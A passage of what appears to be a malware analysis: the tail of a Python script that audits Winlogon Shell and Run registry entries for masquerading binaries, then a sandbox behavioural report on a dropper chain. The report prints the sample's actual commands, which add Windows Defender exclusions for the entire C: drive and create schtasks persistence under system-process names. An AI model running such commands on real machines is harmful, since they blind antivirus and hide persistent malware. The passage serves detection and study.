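              "c:\\windows\\system32\\windowspowershell\\v1.0",
              "c:\\windows\\syswow64\\windowspowershell\\v1.0"}


def split_shell_value(value):
    """Split Winlogon\\Shell data on commas, honouring the quotes around paths with spaces."""
    fields = next(csv.reader([value], skipinitialspace=True))
    return [f.strip() for f in fields if f.strip()]


def classify_path(entry):
    """'expected' for the stock explorer.exe shell, 'masquerade' for a system binary
    name outside a system directory, 'unexpected' for anything else."""
    p = PureWindowsPath(entry.strip().strip('"'))
    name, parent = p.name.lower(), str(p.parent).lower()
    if name == "explorer.exe" and parent in {".", "c:\\windows"}:
        return "expected"
    if name in SYSTEM_NAMES and parent not in LEGIT_DIRS:
        return "masquerade"
    return "unexpected"


def audit_winlogon_shell(value):
    """(entry, verdict) for every Shell entry; anything not 'expected' is a finding."""
    return [(e, classify_path(e)) for e in split_shell_value(value)]


def audit_run_values(run_values):
    """Verdict per Run value name."""
    return {name: classify_path(data) for name, data in run_values.items()}


def cleaned_shell(value):
    """The Shell data with every non-'expected' entry removed: what remediation writes back."""
    keep = [e for e, v in audit_winlogon_shell(value) if v == "expected"]
    return ", ".join(keep) or "explorer.exe"


if __name__ == "__main__":
    for entry, verdict in audit_winlogon_shell(SAMPLE_SHELL):
        print(f"Shell  {verdict:<11} {entry}")
    for name, verdict in audit_run_values(SAMPLE_RUN).items():
        print(f"Run    {verdict:<11} {name}")
    print("remediated Shell =", cleaned_shell(SAMPLE_SHELL))
```

Run against the sample, the only 'expected' entry is the leading explorer.exe; the five appended paths and all four Run values come back as 'masquerade'. On a live host, feed the function the output of reading HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell and the HKLM and HKCU Run keys; note that the 'expected' rule only accepts explorer.exe, so a legitimately customised shell will show as 'unexpected' and needs a local allow-list.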

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\Windows\System32\CSCD632E12AB0041D0975A814584C955D9.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\vlmvdx.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Google\Temp\e978f868350d50 C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
File created C:\Program Files\Internet Explorer\en-US\powershell.exe C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
File created C:\Program Files\Internet Explorer\en-US\e978f868350d50 C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
File created C:\Program Files (x86)\Google\Temp\powershell.exe C:\comServerRefcrtNet\ComsurrogateHost.exe N/A

Enumerates physical storage devices

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
N/A N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\comServerRefcrtNet\ComsurrogateHost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2768 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\hwid.exe
PID 2768 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\hwid.exe
PID 2768 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\hwid.exe
PID 2768 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\hwid.exe
PID 2768 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe
PID 2768 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe
PID 2768 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe
PID 2768 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe
PID 2676 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\hwid.exe C:\Windows\SysWOW64\WScript.exe
PID 2676 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\hwid.exe C:\Windows\SysWOW64\WScript.exe
PID 2676 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\hwid.exe C:\Windows\SysWOW64\WScript.exe
PID 2676 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\hwid.exe C:\Windows\SysWOW64\WScript.exe
PID 2584 wrote to memory of 2012 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2584 wrote to memory of 2012 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2584 wrote to memory of 2012 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2584 wrote to memory of 2012 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2012 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\comServerRefcrtNet\ComsurrogateHost.exe
PID 2012 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\comServerRefcrtNet\ComsurrogateHost.exe
PID 2012 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\comServerRefcrtNet\ComsurrogateHost.exe
PID 2012 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\comServerRefcrtNet\ComsurrogateHost.exe
PID 3012 wrote to memory of 2900 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2900 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2900 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2040 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2040 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2040 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1860 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1860 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1860 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1892 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1892 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1892 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2020 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2020 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2020 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1844 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1844 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1844 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2440 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2440 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2440 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1540 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1540 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1540 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2872 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2872 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2872 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1928 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1928 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1928 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2816 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2816 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2816 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1068 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1068 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 1068 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 3040 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 3040 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 3040 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3012 wrote to memory of 2072 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3012 wrote to memory of 2072 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3012 wrote to memory of 2072 N/A C:\comServerRefcrtNet\ComsurrogateHost.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2072 wrote to memory of 1656 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2072 wrote to memory of 1656 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe

"C:\Users\Admin\AppData\Local\Temp\QuwyWare.exe"

C:\Users\Admin\AppData\Local\Temp\hwid.exe

"C:\Users\Admin\AppData\Local\Temp\hwid.exe"

C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe

"C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\comServerRefcrtNet\mqTOHq8aHZClYn48E.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\comServerRefcrtNet\lnxvZRavX52Sj8TeqZsoOZAX1b085ZLmiJmz2YXZ5HGWoFSPgyZVlmrEm.bat" "

C:\comServerRefcrtNet\ComsurrogateHost.exe

"C:\comServerRefcrtNet/ComsurrogateHost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/comServerRefcrtNet/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Recovery\b2a802a2-3b12-11ef-8991-d2f1755c8afd\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\b2a802a2-3b12-11ef-8991-d2f1755c8afd\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Recovery\b2a802a2-3b12-11ef-8991-d2f1755c8afd\wininit.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bbyzxjhe\bbyzxjhe.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8037.tmp" "c:\Windows\System32\CSCD632E12AB0041D0975A814584C955D9.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Google\Temp\powershell.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Google\Temp\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 13 /tr "'C:\Program Files\Internet Explorer\en-US\powershell.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 7 /tr "'C:\Program Files\Internet Explorer\en-US\powershell.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Recovery\b2a802a2-3b12-11ef-8991-d2f1755c8afd\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\b2a802a2-3b12-11ef-8991-d2f1755c8afd\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Recovery\b2a802a2-3b12-11ef-8991-d2f1755c8afd\conhost.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NzET29XDKR.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe

"C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/comServerRefcrtNet/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1QWUF8ga47.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe

"C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/comServerRefcrtNet/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

